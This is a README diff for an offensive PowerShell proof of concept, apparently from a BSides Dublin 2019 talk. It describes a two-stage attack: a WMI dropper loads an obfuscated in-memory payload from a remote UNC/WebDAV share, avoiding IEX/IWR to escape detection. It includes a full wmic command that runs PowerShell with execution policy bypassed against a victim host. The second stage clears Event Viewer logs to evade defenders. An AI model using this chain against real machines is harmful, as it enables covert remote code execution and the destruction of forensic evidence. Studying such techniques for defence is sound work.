kmkz/PowerShell/BsidesDublin-2019/README.md

         The "stage 1" is a simple dropper for payload delivery through UNC/WebDAV using basic obfuscation (require admin. privs for RCE over WMI ofc).
 	It is executed from attackers station (C2C) to run in-memory fud PowerShell without the well-known `IWR/IEX` method calls.

 [*] Notes:
 UNC/WebDAV could be replaced by WMI namespaces as presented in WmiSploit project `https://github.com/secabstraction/WmiSploit`.

 However, the executed command is then limited to 8190 chars due to `-EncodedCommand` usage for b64 payload, this is the reason why I prefered this method for the PoC.

-        Note that .ps1 file is executed over WMI without `invoke-expression` (iex) nor `wget/invoke-webrequest` (iwr) method to prevent alerting.
+An important thing here is that .ps1 file is executed over WMI without `invoke-expression` (iex) nor `wget/invoke-webrequest` (iwr) method to prevent alerting.

 Classic stager from command line:
 	```
             wmic.exe /node:"Victime-PC" /user:WORKGROUP\admin process call create "PowErSheLl -eXecUtIonpOliCY BypAsS -NopRofilE -fILe \\Vboxsvr\shared\BSIDESIE\class-derivation.ps1"
 	```

    **Stage 2** (executed on target):
   In-memory build stage 2 using "-File" parameter (obfuscated PowerShell with random Class Derivation).

   Randomly generated class derivation and "EventViewer" logs removing for detection mechanisms/blue team evasion.
   Stage 1 execution is not removed from logs for demo purpose, it should be modified for a total discretion ;).

    [*] Notes: